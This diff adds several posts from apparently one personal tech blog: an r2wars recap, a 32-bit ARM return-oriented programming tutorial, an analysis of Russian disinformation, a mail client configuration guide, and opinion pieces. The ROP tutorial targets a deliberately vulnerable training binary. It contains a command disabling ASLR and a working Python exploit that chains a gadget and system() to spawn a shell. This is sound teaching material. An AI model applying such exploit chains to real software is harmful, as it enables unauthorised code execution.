+
+   day 3
+
+day 4: the finals
+
+   I spent a lot of time refactoring my bot. I tried all kinds of things,
+   even reworked it to be entirely mobile using the pushal + jmp esp
+   trick, but I just wasn't satisfied. In the end, I decided to address
+   the problem in the simplest way possible. You're checking 0x000? Okay,
+   I'll reposition my initial payload to 0xd.
+
+   And this surprisingly tiny change landed me in 4th place out of 15
+   contestants, which was way better than I'd anticipated! The top spots
+   were all claimed by ARM, and naturally so -- they had a potential
+   throughput of 64 bytes per cycle thanks to stmia, compared to x86's 32
+   bytes. Pretty neat!
+
+   day 4
+
+links and references
+
+     * [5]Anisse's r2wars 2019 post
+     * [6]Emile's intro to r2wars
+     * [7]How not to suck at r2wars
+     * [8]r2wars: Shall we play a game?
+     * [9]Shell Storm's online (dis)assembler
+     * [10]radare2
+     * [11]r2wars game engine
+     * [12]Anisse's bot workspace
+     * [13]My bot dev workspace
+     * [14]r2con YouTube
+
+closing thoughts
+
+   This was my first ever r2wars, and it was an incredible experience. Who
+   woulda thunk staring at colored boxes on the screen would be so much
+   fun?! So much so that my parents walked over to see what all the fuss
+   was about. Shoutout to [15]Abel and [16]pancake for taking the time out
+   to work on this, and especially Abel for dealing with all the last
+   minute updates and bot submissions!
+
+   All things said, mine was still the best x86 bot -- so that's a win. ;)
+
+References
+
+   1. https://github.com/radareorg/r2wars
+   2. http://corewars.org/
+   3. https://radare.gitbooks.io/radare2book/content/disassembling/esil.html
+   4. https://rada.re/con/2020
+   5. https://anisse.astier.eu/r2wars-2019.html
+   6. https://www.tildeho.me/r2wars/
+   7. https://bananamafia.dev/post/r2wars-2019/
+   8. https://ackcent.com/r2wars-shall-we-play-a-game/
+   9. http://shell-storm.org/online/Online-Assembler-and-Disassembler
+  10. https://github.com/radareorg/radare2
+  11. https://github.com/radareorg/r2wars
+  12. https://github.com/anisse/r2warsbots
+  13. https://github.com/icyphox/r2wars-bots
+  14. https://www.youtube.com/channel/UCZo6gyBPj6Vgg8u2dfIhY4Q
+  15. https://twitter.com/sanguinawer
+  16. https://twitter.com/trufae

@@ -0,0 +1,220 @@ 
+   06 June, 2019
+
+Return Oriented Programming on ARM (32-bit)
+
+Making stack-based exploitation great again!
+
+   Before we start anything, you're expected to know the basics of ARM
+   assembly to follow along. I highly recommend [1]Azeria's series on
+   [2]ARM Assembly Basics. Once you're comfortable with it, proceed with
+   the next bit -- environment setup.
+
+Setup
+
+   Since we're working with the ARM architecture, there are two options to
+   go forth with:
+    1. Emulate -- head over to [3]qemu.org/download and install QEMU. And
+       then download and extract the ARMv6 Debian Stretch image from one
+       of the links [4]here. The scripts found inside should be
+       self-explanatory.
+    2. Use actual ARM hardware, like an RPi.
+
+   For debugging and disassembling, we'll be using plain old gdb, but you
+   may use radare2, IDA or anything else, really. All of which can be
+   trivially installed.
+
+   And for the sake of simplicity, disable ASLR:
+$ echo 0 > /proc/sys/kernel/randomize_va_space
+
+   Finally, the binary we'll be using in this exercise is [5]Billy Ellis'
+   [6]roplevel2.
+
+   Compile it:
+$ gcc roplevel2.c -o rop2
+
+   With that out of the way, here's a quick run down of what ROP actually
+   is.
+
+A primer on ROP
+
+   ROP or Return Oriented Programming is a modern exploitation technique
+   that's used to bypass protections like the NX bit (no-execute bit) and
+   code sigining. In essence, no code in the binary is actually modified
+   and the entire exploit is crafted out of pre-existing artifacts within
+   the binary, known as gadgets.
+
+   A gadget is essentially a small sequence of code (instructions), ending
+   with a ret, or a return instruction. In our case, since we're dealing
+   with ARM code, there is no ret instruction but rather a pop {pc} or a
+   bx lr. These gadgets are chained together by jumping (returning) from
+   one onto the other to form what's called as a ropchain. At the end of a
+   ropchain, there's generally a call to system(), to acheive code
+   execution.
+
+   In practice, the process of executing a ropchain is something like
+   this:
+     * confirm the existence of a stack-based buffer overflow
+     * identify the offset at which the instruction pointer gets
+       overwritten
+     * locate the addresses of the gadgets you wish to use
+     * craft your input keeping in mind the stack's layout, and chain the
+       addresses of your gadgets
+
+   [7]LiveOverflow has a [8]beautiful video where he explains ROP using
+   "weird machines". Check it out, it might be just what you needed for
+   that "aha!" moment :)
+
+   Still don't get it? Don't fret, we'll look at actual exploit code in a
+   bit and hopefully that should put things into perspective.
+
+Exploring our binary
+
+   Start by running it, and entering any arbitrary string. On entering a
+   fairly large string, say, "A" × 20, we see a segmentation fault occur.
+
+   string and segfault
+
+   Now, open it up in gdb and look at the functions inside it.
+
+   gdb functions
+
+   There are three functions that are of importance here, main, winner and
+   gadget. Disassembling the main function:
+
+   gdb main disassembly
+
+   We see a buffer of 16 bytes being created (sub sp, sp, #16), and some
+   calls to puts()/printf() and scanf(). Looks like winner and gadget are
+   never actually called.
+
+   Disassembling the gadget function:
+
+   gdb gadget disassembly
+
+   This is fairly simple, the stack is being initialized by pushing {r11},
+   which is also the frame pointer (fp). What's interesting is the pop
+   {r0, pc} instruction in the middle. This is a gadget.
+
+   We can use this to control what goes into r0 and pc. Unlike in x86
+   where arguments to functions are passed on the stack, in ARM the
+   registers r0 to r3 are used for this. So this gadget effectively allows
+   us to pass arguments to functions using r0, and subsequently jumping to
+   them by passing its address in pc. Neat.
+
+   Moving on to the disassembly of the winner function:
+
+   gdb winner disassembly
+
+   Here, we see a calls to puts(), system() and finally, exit(). So our
+   end goal here is to, quite obviously, execute code via the system()
+   function.
+
+   Now that we have an overview of what's in the binary, let's formulate a
+   method of exploitation by messing around with inputs.
+
+Messing around with inputs :^)
+
+   Back to gdb, hit r to run and pass in a patterned input, like in the
+   screenshot.
+
+   gdb info reg post segfault
+
+   We hit a segfault because of invalid memory at address 0x46464646.
+   Notice the pc has been overwritten with our input. So we smashed the
+   stack alright, but more importantly, it's at the letter `F'.
+
+   Since we know the offset at which the pc gets overwritten, we can now
+   control program execution flow. Let's try jumping to the winner
+   function.
+
+   Disassemble winner again using disas winner and note down the offset of
+   the second instruction -- add r11, sp, #4. For this, we'll use Python
+   to print our input string replacing FFFF with the address of winner.
+   Note the endianness.
+$ python -c 'print("AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00")' | ./rop2
+
+   jump to winner
+
+   The reason we don't jump to the first instruction is because we want to
+   control the stack ourselves. If we allow push {rll, lr} (first
+   instruction) to occur, the program will pop those out after winner is
+   done executing and we will no longer control where it jumps to.
+
+   So that didn't do much, just prints out a string "Nothing much
+   here...". But it does however, contain system(). Which somehow needs to
+   be populated with an argument to do what we want (run a command,
+   execute a shell, etc.).
+
+   To do that, we'll follow a multi-step process:
+    1. Jump to the address of gadget, again the 2nd instruction. This will
+       pop r0 and pc.
+    2. Push our command to be executed, say "/bin/sh" onto the stack. This
+       will go into r0.
+    3. Then, push the address of system(). And this will go into pc.
+
+   The pseudo-code is something like this:
+string = AAAABBBBCCCCDDDDEEEE
+gadget = # addr of gadget
+binsh  = # addr of /bin/sh
+system = # addr of system()
+
+print(string + gadget + binsh + system)
+
+   Clean and mean.
+
+The exploit
+
+   To write the exploit, we'll use Python and the absolute godsend of a
+   library -- struct. It allows us to pack the bytes of addresses to the
+   endianness of our choice. It probably does a lot more, but who cares.
+
+   Let's start by fetching the address of /bin/sh. In gdb, set a
+   breakpoint at main, hit r to run, and search the entire address space
+   for the string "/bin/sh":
+(gdb) find &system, +9999999, "/bin/sh"
+
+   gdb finding /bin/sh
+
+   One hit at 0xb6f85588. The addresses of gadget and system() can be
+   found from the disassmblies from earlier. Here's the final exploit
+   code:
+import struct
+
+binsh = struct.pack("I", 0xb6f85588)
+string = "AAAABBBBCCCCDDDDEEEE"
+gadget = struct.pack("I", 0x00010550)
+system = struct.pack("I", 0x00010538)
+
+print(string + gadget + binsh + system)
+
+
+   Honestly, not too far off from our pseudo-code :)
+
+   Let's see it in action:
+
+   the shell!
+
+   Notice that it doesn't work the first time, and this is because /bin/sh
+   terminates when the pipe closes, since there's no input coming in from
+   STDIN. To get around this, we use cat(1) which allows us to relay input
+   through it to the shell. Nifty trick.
+
+Conclusion
+
+   This was a fairly basic challenge, with everything laid out
+   conveniently. Actual ropchaining is a little more involved, with a lot
+   more gadgets to be chained to acheive code execution.
+
+   Hopefully, I'll get around to writing about heap exploitation on ARM
+   too. That's all for now.
+
+References
+
+   1. https://twitter.com/fox0x01
+   2. https://azeria-labs.com/writing-arm-assembly-part-1/
+   3. https://www.qemu.org/download/
+   4. https://blahcat.github.io/qemu/
+   5. https://twitter.com/bellis1000
+   6. https://icyphox.sh/static/files/roplevel2.c
+   7. https://twitter.com/LiveOverflow
+   8. https://www.youtube.com/watch?v=zaQVNM3or7k&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&index=46&t=0s

@@ -0,0 +1,170 @@ 
+   12 December, 2019
+
+Disinfo war: RU vs GB
+
+A look at Russian info ops against Britain
+
+   This entire sequence of events begins with the attempted poisoning of
+   Sergei Skripal^[1]1, an ex-GRU officer who was a double-agent for the
+   UK's intelligence services. This hit attempt happened on the 4th of
+   March, 2018. 8 days later, then-Prime Minister Theresa May formally
+   accused Russia for the attack.
+
+   The toxin used in the poisoning was a nerve agent called Novichok. In
+   addition to the British military-research facility at Porton Down, a
+   small number of labs around the world were tasked with confirming
+   Porton Down's conclusions on the toxin that was used, by the OPCW
+   (Organisation for the Prohibition of Chemical Weapons).
+
+   With the background on the matter out of the way, here are the
+   different instances of well timed disinformation pushed out by Moscow.
+
+The Russian offense
+
+April 14, 2018
+
+     * RT published an article claiming that Spiez had identified a
+       different toxin -- BZ, and not Novichok.
+     * This was an attempt to shift the blame from Russia (origin of
+       Novichok), to NATO countries, where it was apparently in use.
+     * Most viral piece on the matter in all of 2018.
+
+   Although technically correct, this isn't the entire truth. As part of
+   protocol, the OPCW added a new substance to the sample as a test. If
+   any of the labs failed to identify this substance, their findings were
+   deemed untrustworthy. This toxin was a derivative of BZ.
+
+   Here are a few interesting things to note:
+    1. The entire process starting with the OPCW and the labs is
+       top-secret. How did Russia even know Speiz was one of the labs?
+    2. On April 11th, the OPCW mentioned BZ in a report confirming Porton
+       Down's findings. Note that Russia is a part of OPCW, and are fully
+       aware of the quality control measures in place. Surely they knew
+       about the reason for BZ's use?
+
+   Regardless, the Russian version of the story spread fast. They cashed
+   in on two major factors to plant this disinfo:
+    1. "NATO bad" : Overused, but surprisingly works. People love a story
+       that goes full 180°.
+    2. Spiez can't defend itself: At the risk of revealing that it was one
+       of the facilities testing the toxin, Spiez was only able to "not
+       comment".
+
+April 3, 2018
+
+     * The Independent publishes a story based on an interview with the
+       chief executive of Porton Down, Gary Aitkenhead.
+     * Aitkenhead says they've identified Novichok but "have not
+       identified the precise source".
+     * Days earlier, Boris Johnson (then-Foreign Secretary) claimed that
+       Porton Down confirmed the origin of the toxin to be Russia.
+     * This discrepancy was immediately promoted by Moscow, and its
+       network all over.
+
+   This one is especially interesting because of how simple it is to
+   exploit a small contradiction, that could've been an honest mistake.
+   This episode is also interesting because the British actually attempted
+   damage control this time. Porton Down tried to clarify Aitkenhead's
+   statement via a tweet^[2]2:
+
+     Our experts have precisely identified the nerve agent as a Novichok.
+     It is not, and has never been, our responsibility to confirm the
+     source of the agent @skynews @UKmoments
+
+   Quoting the [3]Defense One article on the matter:
+
+     The episode is seen by those inside Britain's security
+     communications team as the most serious misstep of the crisis, which
+     for a period caused real concern. U.K. officials told me that, in
+     hindsight, Aikenhead could never have blamed Russia directly,
+     because that was not his job--all he was qualified to do was
+     identify the chemical. Johnson, in going too far, was more damaging.
+     Two years on, he is now prime minister.
+
+May 2018
+
+     * OPCW facilities receive an email from Spiez inviting them to a
+       conference.
+     * The conference itself is real, and has been organized before.
+     * The email however, was not -- attached was a Word document
+       containing malware.
+     * Also seen were inconsistencies in the email formatting, from what
+       was normal.
+
+   This spearphishing campaign was never offically attributed to Moscow,
+   but there are a lot of tells here that point to it being the work of a
+   state actor:
+    1. Attack targetting a specific group of individuals.
+    2. Relatively high level of sophistication -- email formatting,
+       malicious Word doc, etc.
+
+   However, the British NCSC have deemed with "high confidence" that the
+   attack was perpetrated by GRU. In the UK intelligence parlance, "highly
+   likely" / "high confidence" usually means "definitely".
+
+Britain's defense
+
+September 5, 2018
+
+   The UK took a lot of hits in 2018, but they eventually came back:
+     * Metropolitan Police has a meeting with the press, releasing their
+       findings.
+     * CCTV footage showing the two Russian hitmen was released.
+     * Traces of Novichok identified in their hotel room.
+
+   This sudden news explosion from Britan's side completely bulldozed the
+   information space pertaining to the entire event. According to Defense
+   One:
+
+     Only two of the 10 most viral stories in the weeks following the
+     announcement were sympathetic to Russia, according to NewsWhip.
+     Finally, officials recalled, it felt as though the U.K. was the
+     aggressor. "This was all kept secret to put the Russians on the
+     hop," one told me. "Their response was all over the place from this
+     point. It was the turning point."
+
+   Earlier in April, 4 GRU agents were arrested in the Netherlands, who
+   were there to execute a cyber operation against the OPCW (located in
+   The Hague), via their WiFi networks. They were arrested by Dutch
+   security, and later identifed as belonging to Unit 26165. They also
+   seized a bunch of equipment from the room and their car.
+
+     The abandoned equipment revealed that the GRU unit involved had sent
+     officers around the world to conduct similar cyberattacks. They had
+     been in Malaysia trying to steal information about the investigation
+     into the downed Malaysia Airlines Flight 17, and at a hotel in
+     Lausanne, Switzerland, where a World Anti-Doping Agency (WADA)
+     conference was taking place as Russia faced sanctions from the
+     International Olympic Committee. Britain has said that the same GRU
+     unit attempted to compromise Foreign Office and Porton Down computer
+     systems after the Skripal poisoning.
+
+October 4, 2018
+
+   UK made the arrests public, published a list of infractions commited by
+   Russia, along with the specific GRU unit that was caught.
+
+   During this period, just one of the top 25 viral stories was from a
+   pro-Russian outlet, RT -- that too a fairly straightforward piece.
+
+Wrapping up
+
+   As with conventional warfare, it's hard to determine who won. Britain
+   may have had the last blow, but Moscow -- yet again---depicted their
+   finesse in information warfare. Their ability to seize unexpected
+   openings, gather intel to facilitate their disinformation campaigns,
+   and their cyber capabilities makes them a formidable threat.
+
+   2020 will be fun, to say the least.
+     __________________________________________________________________
+
+    1. [4]https://en.wikipedia.org/wiki/Sergei_Skripal
+    2. [5]https://twitter.com/dstlmod/status/981220158680260613
+
+References
+
+   1. https://icyphox.sh/home/icy/leet/site/build/blog/ru-vs-gb/temp.html#fn:skripal
+   2. https://icyphox.sh/home/icy/leet/site/build/blog/ru-vs-gb/temp.html#fn:dstltweet
+   3. https://www.defenseone.com/threats/2019/12/britains-secret-war-russia/161665/
+   4. https://en.wikipedia.org/wiki/Sergei_Skripal
+   5. https://twitter.com/dstlmod/status/981220158680260613

@@ -0,0 +1,162 @@ 
+   06 May, 2020
+
+The S-nail mail client
+
+And how to achieve a usable configuration for IMAP/SMTP
+
+   TL;DR: Here's my [1].mailrc.
+
+   As I'd mentioned in my blog post about [2]mael, I've been on the
+   lookout for a good, usable mail client. As it happens, I found S-nail
+   just as I was about to give up on mael. Turns out writing an MUA isn't
+   all too easy after all. S-nail turned out to be the perfect client for
+   me, but I had to invest quite some time in reading the [3]very thorough
+   manual and exchanging emails with its [4]very friendly author. I did it
+   so you don't have to^[5]1, and I present to you this guide.
+
+basic settings
+
+   These settings below should guarantee some sane defaults to get started
+   with. Comments added for context.
+# enable upward compatibility with S-nail v15.0
+set v15-compat
+
+# charsets we send mail in
+set sendcharsets=utf-8,iso-8859-1
+
+# reply back in sender's charset
+set reply-in-same-charset
+
+# prevent stripping of full names in replies
+set fullnames
+
+# adds a 'Mail-Followup-To' header; useful in mailing lists
+set followup-to followup-to-honour-ask-yes
+
+# asks for an attachment after composing
+set askattach
+
+# marks a replied message as answered
+set markanswered
+
+# honors the 'Reply-To' header
+set reply-to-honour
+
+# automatically launches the editor while composing mail interactively
+set editalong
+
+# I didn't fully understand this :)
+set history-gabby=all
+
+# command history storage
+set history-file=~/.s-nailhist
+
+# sort mail by date (try 'thread' for threaded view)
+set autosort=date
+
+authentication
+
+   With these out of the way, we can move on to configuring our account --
+   authenticating IMAP and SMTP. Before that, however, we'll have to
+   create a ~/.netrc file to store our account credentials.
+
+   (This of course, assumes that your SMTP and IMAP credentials are the
+   same. I don't know what to do otherwise. )
+machine *.domain.tld login user@domain.tld password hunter2
+
+   Once done, encrypt this file using gpg / gpg2. This is optional, but
+   recommended.
+$ gpg2 --symmetric --cipher-algo AES256 -o .netrc.gpg .netrc
+
+   You can now delete the plaintext .netrc file. Now add these lines to
+   your .mailrc:
+set netrc-lookup
+set netrc-pipe='gpg2 -qd ~/.netrc.gpg'
+
+   Before we define our account block, add these two lines for a nicer
+   IMAP experience:
+set imap-cache=~/.cache/nail
+set imap-keepalive=240
+
+   Defining an account is dead simple.
+account "personal" {
+    localopts yes
+    set from="Your Name <user@domain.tld>"
+    set folder=imaps://imap.domain.tld:993
+
+    # copy sent messages to Sent; '+' indicates subdir of 'folder'
+    set record=+Sent
+    set inbox=+INBOX
+
+    # optionally, set this to 'smtps' and change the port accordingly
+    # remove 'smtp-use-starttls'
+    set mta=smtp://smtp.domain.tld:587 smtp-use-starttls
+
+    # couple of shortcuts to useful folders
+    shortcut sent +Sent \
+        inbox +INBOX \
+        drafts +Drafts \
+        trash +Trash \
+        archives +Archives
+}
+
+# enable account on startup
+account personal
+
+   You might also want to trash mail, instead of perma-deleting them
+   (delete does that). To achieve this, we define an alias:
+define trash {
+    move "$@" +Trash
+}
+
+commandalias del call trash
+
+   Replace +Trash with the relative path to your trash folder.
+
+aesthetics
+
+   The fun stuff. I don't feel like explaining what these do (hint: I
+   don't fully understand it either), so just copy-paste it and mess
+   around with the colors:
+# use whatever symbol you fancy
+set prompt='> '
+
+colour 256 sum-dotmark ft=bold,fg=13 dot
+colour 256 sum-header fg=007 older
+colour 256 sum-header bg=008 dot
+colour 256 sum-header fg=white
+colour 256 sum-thread bg=008 dot
+colour 256 sum-thread fg=cyan
+
+   The prompt can be configured more extensively, but I don't need it.
+   Read the man page if you do.
+
+essential commands
+
+   Eh, you can just read the man page, I guess. But here's a quick list
+   off the top of my head:
+     * headers: Lists all messages, with the date, subject etc.
+     * mail: Compose mail.
+     * <number>: Read mail by specifiying its number on the message list.
+     * delete <number>: Delete mail.
+     * new <number>: Mark as new (unread).
+     * file <shortcut or path to folder>: Change folders. For example:
+       file sent
+
+   That's all there is to it.
+
+   This is day 2 of the #100DaysToOffload challenge. I didn't think I'd
+   participate, until today. So yesterday's post is day 1. Will I keep at
+   it? I dunno. We'll see.
+     __________________________________________________________________
+
+    1. Honestly, read the man page (and email Steffen!) -- there's a ton
+       of useful options in there.
+
+References
+
+   1. https://github.com/icyphox/dotfiles/blob/master/home/.mailrc
+   2. https://icyphox.sh/blog/mael
+   3. https://www.sdaoden.eu/code-nail.html
+   4. https://www.sdaoden.eu/
+   5. https://icyphox.sh/home/icy/leet/site/build/blog/s-nail/temp.html#fn:read-man

@@ -0,0 +1,63 @@ 
+   23 November, 2019
+
+Save .ORG!
+
+PIR is getting sold to a private firm, and here's why it's bad
+
+   The .ORG top-level domain introduced in 1985, has been operated by the
+   [1]Public Interest Registry since
+    1. The .ORG TLD is used primarily by communities, free and open source
+       projects, and other non-profit organizations -- although the use of
+       the TLD isn't restricted to non-profits.
+
+   The Internet Society or ISOC, the group that created the PIR, has
+   decided to sell the registry over to a private equity firm -- Ethos
+   Capital.
+
+What's the problem?
+
+   There are around 10 million .ORG TLDs registered, and a good portion of
+   them are non-profits and non-governmental organizations. As the name
+   suggests, they don't earn any profits and all their operations rely on
+   a thin inflow of donations. A private firm having control of the .ORG
+   domain gives them the power to make decisions that would be
+   unfavourable to the .ORG community:
+     * They control the registration/renewal fees of the TLD. They can
+       hike the price if they wish to. As is stands, NGOs already earn
+       very little -- a .ORG price hike would put them in a very icky
+       situation.
+     * They can introduce [2]Rights Protection Mechanisms or RPMs, which
+       are essentially legal statements that can -- if not correctly
+       developed -- jeopardize / censor completely legal non-profit
+       activities.
+     * Lastly, they can suspend domains at the whim of state actors. It
+       isn't news that nation states go after NGOs, targetting them with
+       allegations of illegal activity. The registry being a private firm
+       only simplifies the process.
+
+   Sure, these are just "what ifs" and speculations, but the risk is real.
+   Such power can be abused and this would be severly detrimental to NGOs
+   globally.
+
+How can I help?
+
+   We need to get the ISOC to stop the sale. Head over to
+   [3]https://savedotorg.org and sign their letter. An email is sent on
+   your behalf to:
+     * Andrew Sullivan, CEO, ISOC
+     * Jon Nevett, CEO, PIR
+     * Maarten Botterman, Board Chair, ICANN
+     * Göran Marby, CEO, ICANN
+
+Closing thoughts
+
+   The Internet that we all love and care for is slowly being subsumed by
+   megacorps and private firms, who's only motive is to make a profit. The
+   Internet was meant to be free, and we'd better act now if we want that
+   freedom. The future looks bleak -- I hope we aren't too late.
+
+References
+
+   1. https://en.wikipedia.org/wiki/Public_Interest_Registry
+   2. https://www.icann.org/resources/pages/rpm-drp-2017-10-04-en
+   3. https://savedotorg.org/

@@ -0,0 +1,53 @@ 
+   07 May, 2020
+
+Simplicity (mostly) guarantees security
+
+This is why I meme mnmlsm so much
+
+   Although it is a very comfy one, it's not just an aesthetic. Simplicity
+   and minimalism, in technology, is great for security too. I say
+   "mostly" in the title because human error cannot be discounted, and
+   nothing is perfect. However, the simpler your tech stack is, it is
+   inherentely more secure than complex monstrosities.
+
+   Let's look at systemd, for example. It's got over 1.2 million lines of
+   code. "Hurr durr but LoC doesn't mean anything!" Sure ok, but can you
+   imagine auditing this? How many times has it even been audited? I
+   couldn't find any audit reports. No, the developers are not security
+   engineers and a trustworthy audit must be done by a third-party. What's
+   scarier, is this thing runs on a huge percentage of the world's
+   critical infrastructure and contains privileged core subsystems.
+
+   "B-but Linux is much bigger!" Indeed, it is, but it has a thousand
+   times (if not more) the number of eyes looking at the code, and there
+   have been multiple third-party audits. There are hundreds of
+   independent orgs and multiple security teams looking at it. That's not
+   the case with systemd -- it's probably just RedHat.
+
+   Compare this to a bunch of shell scripts. Agreed, writing safe shell
+   can be hard and there are a ton of weird edge-cases depending on your
+   shell implementation, but the distinction here is you wrote it. Which
+   means, you can identify what went wrong -- things are predictable.
+   systemd, however, is a large blackbox, and its state at runtime is
+   largely unprovable and unpredictable. I am certain even the developers
+   don't know.
+
+   And this is why I whine about complexity so much. A complex,
+   unpredictable system is nothing more than a large attack surface. Drew
+   DeVault, head of [1]sourcehut wrote something similar (yes that's the
+   link, yes it has a typo).:
+
+   [2]https://sourcehut.org/blog/2020-04-20-prioritizing-simplitity/
+
+   He manually provisions all sourcehut infrastructure, because tools like
+   Salt, Kubernetes etc. are just like systemd in our example -- large
+   monstrosities which can get you RCE'd. Don't believe me? See [3]this.
+
+   This was day 3 of the #100DaysToOffload challenge. It came out like a
+   systemd-hate post, but really, I couldn't think of a better example.
+
+References
+
+   1. https://sourcehut.org/
+   2. https://sourcehut.org/blog/2020-04-20-prioritizing-simplitity/
+   3. https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/

@@ -0,0 +1,93 @@ 
+   27 May, 2020
+
+Site changes
+
+New stuff at the {back,front}end
+
+   The past couple of days, I've spent a fair amount of time tweaking this
+   site. My site's build process involves [1]vite and a bunch of
+   [2]scripts. These scripts are executed via vite's pre- and post-build
+   actions. The big changes that were made were performance improvements
+   in the update_index.py script, and the addition of openring.py, which
+   you can see at the very bottom of this post!
+
+speeding up index page generation
+
+   The old script -- the one that featured in [3]Hacky scripts -- was
+   absolutely ridiculous, and not to mention super slow. Here's what it
+   did:
+     * got the most recent file (latest post) by sorting all posts by
+       mtime.
+     * parsed the markdown frontmatter and created a markdown table entry
+       like:
+
+line = f"| [{meta['title']}]({url}) | `{meta['date']}` |"
+
+     * updated the markdown table (in _index.md) by in-place editing the
+       markdown, with the line created earlier -- for the latest post.
+     * finally, I'd have to rebuild the entire site since this markdown
+       hackery would happen at the very end of the build, i.e, didn't
+       actually get rendered itself.
+
+   That...probably didn't make much sense to you, did it? Don't bother. I
+   don't know what I was thinking when I wrote that mess. So with how it
+   was done aside, here's how it's done now:
+     * the metadata for all posts are nicely fetched and sorted using
+       python-frontmatter.
+     * the metadata list is fed into Jinja for use in templating, and is
+       rendered very nicely using a simple for expression: {% for p in
+       posts %} <tr> <td align="left"><a href="/blog/{{ p.url }}">{{
+       p.title }}</a></td> <td align="right">{{ p.date }}</td> </tr> {%
+       endfor %}
+
+   A neat thing I learnt while working with Jinja, is you can use
+   DebugUndefined in your jinja2.Environment definition to ignore
+   uninitialized template variables. Jinja's default behaviour is to
+   remove all uninitialized variables from the template output. So for
+   instance, if you had:
+<body>
+    {{ body }}
+</body>
+
+<footer>
+    {{ footer }}
+</footer>
+
+   And only {{ body }} was initialized in your template.render(body=body),
+   the output you get would be:
+<body>
+    Hey there!
+</body>
+<footer>
+
+</footer>
+
+   This is annoying if you're attempting to generate your template across
+   multiple stages, as I was. Now, I initialize my Jinja environment like
+   so:
+from jinja2 import DebugUndefined
+
+env = jinja2.Environment(loader=template_loader,undefined=DebugUndefined)
+
+   I use the same trick for openring.py too. Speaking of...let's talk
+   about openring.py!
+
+the new webring thing at the bottom
+
+   After having seen Drew's [4]openring, my [5]NIH kicked in and I wrote
+   [6]openring.py. It pretty much does the exact same thing, except it's a
+   little more composable with vite. Currently, it reads a random sample
+   of 3 feeds from a list of feeds provided in a feeds.txt file, and
+   updates the webring with those posts. Like a feed-bingo of sorts. ;)
+
+   I really like how it turned out -- especially the fact that I got my
+   CSS grid correct in the first try!
+
+References
+
+   1. https://github.com/icyphox/vite
+   2. https://github.com/icyphox/site/tree/master/bin
+   3. https://icyphox.sh/blog/hacky-scripts
+   4. https://git.sr.ht/~sircmpwn/openring
+   5. https://en.wikipedia.org/wiki/Not_invented_here
+   6. https://github.com/icyphox/openring.py

@@ -0,0 +1,121 @@ 
+   03 August, 2020
+
+Some thoughts on Twitter
+
+I've begun avoiding Twitter, here's why
+
+   This post has been a long time coming. Earlier this year, I decided to
+   not actively participate on Twitter, and stick to the fediverse
+   primarily. This has been quite possibly the best decision I've made,
+   with regard to curating my social / informational feeds -- apart from
+   [1]not reading news. I'll try to gloss over some reasons as to why I
+   dislike Twitter as a platform, in this post. Bear in mind, these are
+   based on my experiences and YMMV.
+
+filter bubbles and radicalization
+
+   I think this can be said about any social network, but the way that
+   Twitter is designed only further enables this phenomenon. The more you
+   interact / show interest in a specific topic, the more you see of the
+   same -- in terms of suggested accounts to follow, notifications/email
+   telling you XYZ tweeted this (you probably don't even follow XYZ).
+
+   I've experienced this first hand. I created an alt and followed a few
+   prominent right-wing accounts (for science!), and within a day or two,
+   my notifications and inbox were filled with similar accounts & tweets.
+
+   This, as a result, means the user is much more likely to see content
+   similar to their own perspectives -- a filter bubble. The user is
+   effectively isolated in their own ideological bubbles. Consequentially,
+   any form of disagreement that occurs is tossed aside as the other
+   party's flaw. Surely they wouldn't hold that perspective if they could
+   see things your way! It's their ignorance!
+
+   One might argue, however, that they do in fact see a lot of opposing
+   viewpoints in their feed. After all, most of mainstream discourse on
+   Twitter is just derisive tweets by proponents of either side^[2]1, at
+   each other. The left quote-tweeting the right and vice versa, for
+   example. In fact, this is pretty much all that today's "news" is about
+   -- constant, endless rebuttals to the other's perspective. I still
+   think this is filter bubbling -- the constant reaffirmation of your
+   ideologies, by taking potshots at the other side.
+
+   And what does constant exposure to a singular viewpoint lead to? That's
+   right, radicalization. I won't get into too much detail -- there really
+   isn't much to say. I'll just add that I know of a few cases IRL, where
+   within little over a year of having created a Twitter account the
+   person's political and ideological positions became hard lines -- and
+   they now straight up refuse to look at things any other way. This is by
+   no means a scientific conclusion; there are various other influencing
+   factors, but my point still stands.
+
+favors mistakes over apologies
+
+   Twitter's design is plagued with flaws, but this one takes the cake. If
+   you screw up or tweet something incorrect, and it happens to go viral,
+   there's literally no good way to publish a correction / apology.
+   Quoting the fantastic article by Nick Punt on [3]deescalating conflict
+   on social media:
+
+     If we ignore replies, the simple amplification effects of likes,
+     replies, retweets, and subtweets leave us exposed and the situation
+     can get out of hand. If we delete and post another, people are
+     unlikely to see our follow-up, as corrections are rarely viral.
+     Similarly, even if we reply, only our viral mistake will be seen in
+     the feed of others.
+
+too much USPOL
+
+   This might be a non-issue for US residents, but gosh is it irritating
+   to see US politics literally everywhere. I'm of the opinion that USPOL
+   is given an unfair amount of attention in mainstream discourse -- to
+   the point where it overshadows everything else, and Twitter is no
+   exception.
+
+generally unhealthy discourse
+
+   If you take a close look at the overarching theme of most Tweets, or
+   even just the popular ones -- you'll notice a fairly negativist outlook
+   across most, if not all of them. The [4]r/2meirl4meirl kind.^[5]2 This
+   is a very unhealthy environment to socialize in. Constantly brooding
+   over things you can't really affect is quite pointless.
+
+   Another general theme is the constant need for one-upping the other --
+   the never-ending contest of who's going to post the most clever
+   comeback. For what? For the likes and retweets, of course. This is also
+   what most of "cancel culture" is really about -- pick a target, post
+   screenshots, add a snide remark: voilà, you have a somewhat popular
+   tweet.
+
+why don't you just curate your feed then bro?
+
+   Yeah, no. I've tried. The problem is, following someone for the
+   technical content doesn't imply they're constantly only going to post
+   that -- and that's their prerogative. And Twitter's annoying "XYZ liked
+   this tweet" doesn't help either. Trying to make your Twitter timeline
+   BS-free is like trying to straighten a dog's tail.
+
+   So what do I suggest then? I really don't know. Honestly, all social
+   media sucks. The entire idea is so contrived and the world would've
+   been better off without it -- the incessant, mind-numbing feed of
+   information. But the shinier turd here is the fediverse. It's not
+   governed by $BIGTECH, and extremists have decided to stick to their own
+   echo chambers like Gab. Oh, and the other side propagates massive
+   blocklists for the tiniest of infractions (defined by them), so they
+   effectively echo chambered themselves too. I'm not complaining.
+
+     "All social media sucks, but the fediverse sucks less."
+                                      -- Me, 2020
+     __________________________________________________________________
+
+    1. By which I mean any two ideologically opposing groups. Not
+       restricted to politics.
+    2. Most posts on that sub are just screenshots of tweets, so...
+
+References
+
+   1. https://icyphox.sh/blog/dont-news
+   2. https://icyphox.sh/home/icy/leet/site/build/blog/twitter/temp.html#fn:1
